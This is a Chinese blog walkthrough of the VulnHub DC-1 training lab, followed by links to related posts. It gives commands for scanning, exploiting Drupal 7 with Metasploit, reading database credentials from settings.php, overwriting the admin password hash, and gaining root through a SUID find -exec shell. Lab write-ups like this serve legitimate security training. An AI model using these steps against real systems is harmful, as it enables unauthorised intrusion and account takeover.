DC-1靶场

于 2024-09-25 11:38:09 发布
阅读量1k 收藏 16
点赞数 21
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84693704/article/details/142518689
版权

一、环境搭建:

1. 靶机描述

DC-1是一个专门建立的脆弱实验室,目的是获得渗透测试领域的经验。它是为初学者设计的挑战,但它到底有多容易取决于你的技能和知识,以及你的学习能力。要成功完成这一挑战,您需要掌握Linux技能,熟悉Linux命令行,并具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。有多种方法可以获得根,但是,我为初学者提供了一些包含线索的标志。总共有五个flag,但最终目标是在根的主目录中找到并读取标志。您甚至不需要成为根用户来执行此操作,但是,您将需要根权限。根据您的技能水平,您可以跳过寻找大多数这些标志,然后继续直。初学者可能会遇到他们以前从未遇到过的挑战,但是谷歌搜索应该是获得完成这个挑战所需的信息所必需的。

 

根据描述信息我们可以知道本靶场环境总共有5个flag。

  1. 下载靶场环境

   靶场下载地址:https://www.vulnhub.com/entry/dc-1,292/

  • 渗透靶场
  1. 打开虚拟机更改网络连接模式为NAT 让DC-1虚拟机跟kali虚拟机在同一网段 这样才能扫出DC-1的主机

2.在kali虚拟机中进去root模式下 进入命令窗输入ifconfig查看kali的ip地址

   

3.寻找靶机真实的IP 使用nmap -sp 加查出来的IP地址/24(nmap -sp XXX.XXX.XXX.XXX/24)

4.探端口及服务输入nmap -A -p- -v 加上回显出来的端口号 (这里我们需要测试正确的IP号)这里我正确的是192.168.28.129

-A 综合性扫描

-v 冗余模式  能扫描出过程中的详细信息

发现开放了22算口,开放了ssh服务,OpenSSH 6.0p1
发现开放了80端口,存在web服务,Apache httpd 2.2.22,Drupal 7
发现开放了111端口,开放了rpcbind服务

接着访问wed站点 在kali火狐中的url里面输入自己正确的IP信息

5.发现此wed运行的是Drupal 7的CMS 回到kali虚拟机输入searchsploit  drupal 7 

我们一般都从CMS出发去找漏洞,可以去百度上查一下drupal 7相关的漏洞

利用MSF渗透

典型的drupal,启动Metersploit  MSF存在drupal模块,尝试使用msf渗透

1.MSF简单命令介绍

msfconsole 进入MSF控制台

search 搜索相应模块

use            对应模块

show options   查看信息

set RHOST   远程主机ip

run            攻击

接着用输入命令Msfconsole 进入MSF控制台找一下漏洞

接着搜索drupal模块

进入MSF控制台msfdb run

搜索drupal模块后输入search drupal

6.可以看出漏洞很多 我们就用2018那个漏洞来测试 接着输入命令use 1

7.设置靶机IP运行msf 输入set rhosts 加上IP号

(我是set rhosts 192.168.28.129)接着在输入run

获取一下普通的shell 在执行whoami

发现是www-date权限

进入home目录 输入cd /home 发现flag4.txt文件 提示需要提升权限

8.使用python反弹一个交互式shell

输入python -c "import pty;pty.spawn('/bin/bash')"

9.显示一个路径 这里只是shsell权限的普通权限还不是root 只能看看文件 输入cd /var/www 发现flag1.txt

在接着输入cat flag1.txt

10.进入到shell中发现了当前所在路径是/var/www

Drupal的默认配置文件为

/var/www/sites/default/settings.php

查看文件内容

输入cat /var/www/sites/default/settings.php

发现了flag2和数据库的账号密码flag2提示,提升权限为root来查看敏感文件

进入数据库查看

'username' => 'dbuser',

'password' => 'R0ck3t',

输入mysql -udbuser -pR0ck3t

查看数据库,切换到drupaldb数据库

输入show databases;

        use drupaldb

        Show tables;

查看查找默认的Drupal user 表

输入select * from users;

发现admin信息

出现了账号用户看不懂 需要我们置换一下drupal密码

输入Quit; 退出进入www目录下 输入php scripts/password-hash.sh 新密码

在进入数据库中把密码字段进行替换
进入mysql,输入密码,切换到drupaldb数据库 输入mysql -u dbuser -pR0ck3t在接着输入use drupaldb

将pass字段进行替换 输入update users set pass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw" where name="admin"

11.访问站点登录 密码是我们刚才替换掉的 账号是admin

成功登录

12.在输入一下Quit; 退出进入www目录下 使用命令查看 suid 权限的可执行二进制程序

输入find / -perm -4000 2>/dev/null

发现find命令

接着我们在使用命令测试 可以发现为root权限

输入touch 123

ls

find / -name 123 -exec "whoami" \;

13.最后就是发现flag文件

输入find ./ -name 123 -exec "/bin/sh" \;   

whoami

ls

cd /root

ls

在输入cat thefinalflag.txt查看文件

实验完成

小瓜瓜呆呆
关注
DC-1靶场搭建及渗透
weixin_55772865的博客
06-13 597
回到/var/www目录下,执行加密脚本 cd ../ php scripts/password-hash.sh 666。1.回到该靶场的根目录下,在scripts目录下存在hash密码加密脚本password-hash.sh。4.扫描192.168.75.129发现就是我们要找的dc-1,且开放80端口,尝试访问一下。首先查找有suid权限的文件,发现find命令有suid权限,那就利用find命令进项提权。4.更新后用户名:admin 密码:666,去开放的80端口网页访问。
DC-1靶场详解
苏生要努力
03-12 2947
DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/
2024kali上打DC-1靶场
2301_80110280的博客
07-16 747
Current Setting是目前设置的内容 Required表示是否需要设置内容,yes为必须设置,no可以设置也可不设置 就上面来说RHOSTS需要set,但是没有内容 所以接着我们来设置一下RHOSTS内容(就是攻击目标IP地址,靶场地址)
DC-1靶场实战详解
热门推荐
a310034188的博客
11-20 1万+
写写自己打DC-1的过程 使用工具 kali DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 第一步:环境配置。 我这里的话kali和DC-1都是nat模式 kali IP为:192.168.28.139 DC-1 IP设置为nat模式,具体多少暂时也不知道。 第二步:信息收集 \1. DC-1 IP不知道,那我们首先就先主机存活探测下,看看靶机IP是多少。 为了提高效率,我们直接用nmap,或者arp-scan。 nmap:nmap -sP
DC-1靶场渗透测试过程(个人学习)
m0_59028058的博客
05-30 1714
DC-1靶场下载地址:攻击机kali的IP地址:192.168.37.129注意靶机和攻击机的环境配置要一致。
DC-1 靶场学习
akxnxbshai的博客
02-24 774
练习一下工具使用。
《Vulhub-DC-1靶场实战》
weixin_47118413的博客
07-06 2294
DC系列目前总共有9个靶机,本次靶机是DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。
DC-1靶场初探
m0_52361291的博客
06-19 723
DC系列靶场环境,这是个模拟红队从信息收集到打点再到提权可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的。靶场下载环境:https ://download.vulnhub.com/dc/DC-1.zip下载完成后就是一个DC-1.ova文件双击用vm打开 就行了可以看到整个环境测试为黑盒测试(无登录账户和密码)首先,先对目标进行信息收集可以看到靶机开了22,80,111三个端口通过浏览器去访问靶机的网页可以看出是DrupalCM
DC-1靶场搭建及渗透实战详细过程
baijiaofei的博客
08-24 1725
DC靶场实战过程
渗透测试初体验:DC-1靶场
SmileAssassn的博客
08-07 490
渗透测试靶场DC:1,新手练习使用
DC-1靶场渗透实验
Alashan12的博客
05-05 1970
一、环境准备 Kali虚拟机 DC-1靶场http://www.five86.com/downloads/DC-1.zip 首先将kali虚拟机和靶机DC1都设置为net模式 ifconfig查看kali的IP为192.168.152.128 使用nmap扫描此网段下的主机 启动DC-1靶机 再次扫描得到DC-1靶机的IP地址为192.168.152.138 二、实验过程 使用nmap针对该IP进行详细扫描 发现打开了22、80和111的端口,还开启了s...
DC-1靶场实战-详细步骤
xt_beginner的博客
01-10 1035
DC-1靶场通关 一、搭建DC-1靶场 详情请看https://blog.csdn.net/xt_beginner/article/details/112442901 二、DC-1靶场攻略 使用nmap快速识别目标主机ip nmap -sP 192.168.74.0/24或arp-scan -l 得到信息:目标主机192.168.74.138 使用nmap快速识别目标主机服务,端口等 nmap -sS -A -p- 192.168.74.138 得到信息:目标主机开放22
DC-6靶场
qq_49518993的博客
08-31 1228
DC-6靶场
计算机毕业设计之:基于微信小程序的诗词智能学习系统(源码+文档+解答)
程序员阿龙的博客
09-22 4400
博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
Online DDL (Data Definition Language)
09-23 255
是MySQL中的一个功能,允许在修改表结构(如添加、删除或修改列)的同时,允许对表进行并发读写操作。在传统的DDL操作中,对表结构的修改会导致整个表被锁定,从而阻止其他事务对该表进行读写操作,这可能导致长时间的锁定和性能问题。Online DDL的引入解决了这个问题,它允许在修改表结构的同时,保持对表的并发访问。MySQL从5.6版本开始引入了Online DDL的部分功能,而在8.0版本中对Online DDL进行了进一步的优化。
MySQL数据库的增删改查以及基本操作分享
m0_57094953的博客
09-21 462
MySQL数据库基本操作分享,包括增删改查,登录退出,查看数据库、表等
Java Alibaba Druid 数据库连接池
miracle的专栏
09-24 716
在Java开发中,数据库连接池是性能优化的重要一环。而作为一款强大的数据库连接池解决方案,凭借其和对多种数据库的支持,成为了许多企业级应用的首选。本篇文章将介绍Druid的核心特性,并结合不同数据库的实际用法。
JPA+Thymeleaf增删改查
最新发布
y050505的博客
09-25 424
在使用JPA(Java Persistence API)和Thymeleaf作为模板引擎进行Web开发时,实现增删改查(CRUD)操作是一个常见的需求。下面,我将简要介绍如何使用Spring Boot框架结合JPA和Thymeleaf来实现这一功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值